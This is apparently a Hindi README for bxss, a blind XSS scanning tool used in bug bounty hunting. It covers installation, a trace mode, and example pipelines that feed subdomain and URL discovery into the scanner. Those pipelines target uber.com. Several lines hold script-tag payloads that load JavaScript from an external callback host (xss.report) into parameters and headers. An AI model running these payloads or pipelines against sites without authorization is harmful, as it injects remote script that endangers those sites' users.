
ब्लाइंड XSS स्कैनर एक उपकरण है जिसका उपयोग वेब एप्लिकेशन में ब्लाइंड XSS कमजोरियों को स्कैन करने के लिए किया जा सकता है।
Bxss एक उच्च-प्रदर्शन ब्लाइंड XSS स्कैनर है जो वेब अनुप्रयोगों में ब्लाइंड XSS कमजोरियों का स्वचालित पता लगाता है।
हम सक्रिय रूप से क्रोमियम-आधारित वर्कर पूल को एकीकृत करने पर काम कर रहे हैं ताकि bxss के प्रदर्शन को कम-अंत उपकरणों पर बेहतर बनाया जा सके।
यह सुविधा संसाधन-गहन कार्यों, जैसे DOM-आधारित XSS का पता लगाना या ट्रिगर के बाद पेलोड निरीक्षण, को एक पूल के माध्यम से प्रबंधित हल्के क्रोमियम इंस्टेंस पर ऑफलोड करने की अनुमति देगी। कई हेडलेस ब्राउज़र संदर्भों में वर्कलोड को नियंत्रित और कुशल तरीके से वितरित करके, bxss कम-स्पेक मशीनों पर भी प्रतिक्रियाशील और उपयोग करने योग्य रहेगा।
यह bxss को न केवल शक्तिशाली बनाएगा बल्कि सिस्टम की बाधाओं के बावजूद अत्यधिक सुलभ भी बनाएगा।
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
ट्रेस मोड एक प्रायोगिक सुविधा है जो आपको ट्रैक करने की अनुमति देती है कि ब्लाइंड XSS कहाँ ट्रिगर हुआ। कुछ तृतीय-पक्ष ब्लाइंड XSS प्लेटफ़ॉर्म जैसे https://xss.report/ आपको अपने पेलोड में कस्टम पैरामीटर निर्दिष्ट करने की अनुमति देते हैं, जिससे आप ट्रैक कर सकते हैं कि ब्लाइंड XSS कहाँ ट्रिगर हुआ। उदाहरण के लिए, यदि आप अपने पेलोड में url=https://somehost.com पैरामीटर निर्दिष्ट करते हैं, तो टूल पेलोड का उपयोग करेगा
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
परीक्षण के लिए और ट्रिगर होने पर आप DOM का निरीक्षण कर सकेंगे और देख सकेंगे कि ब्लाइंड XSS किस होस्ट से ट्रिगर हुआ।
सुनिश्चित करें कि अपने डैशबोर्ड में कस्टम पैरामीटर असाइन करते समय आप url={LINK} असाइन करें ताकि bxss स्वचालित रूप से {LINK} को वास्तविक URL से बदल सके।
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
उन्नत डॉर्किंग और भेद्यता अन्वेषण के लिए, Dorki देखें और आज ही साइन अप करें!
यदि आप इस टूल का उपयोग करके कोई बाउंटी प्राप्त करते हैं, तो मुझे एक कॉफी खरीदकर समर्थन करने पर विचार करें!
| आर्गुमेंट | विवरण | डिफ़ॉल्ट |
|---|
-a | पैरामीटर में पेलोड जोड़ें | false |
-c int | समवर्ती स्तर सेट करें | 30 |
-H string | कस्टम हेडर सेट करें | "" |
-hf string | हेडर वाली फ़ाइल का पथ | "" |
-p string | ब्लाइंड XSS पेलोड | "" |
-pf string | पेलोड वाली फ़ाइल का पथ | "" |
-t | ब्लाइंड XSS के लिए पैरामीटर का परीक्षण करें | false |
-X string | उपयोग करने के लिए HTTP विधि | "" |
-v | डीबग मोड सक्षम करें | false |
-rl float | दर सीमा (प्रति सेकंड अनुरोध) | 0 |
-f | रीडायरेक्ट का पालन करें | false |
-l | ट्रेस मोड सक्षम करें (प्रायोगिक) | false |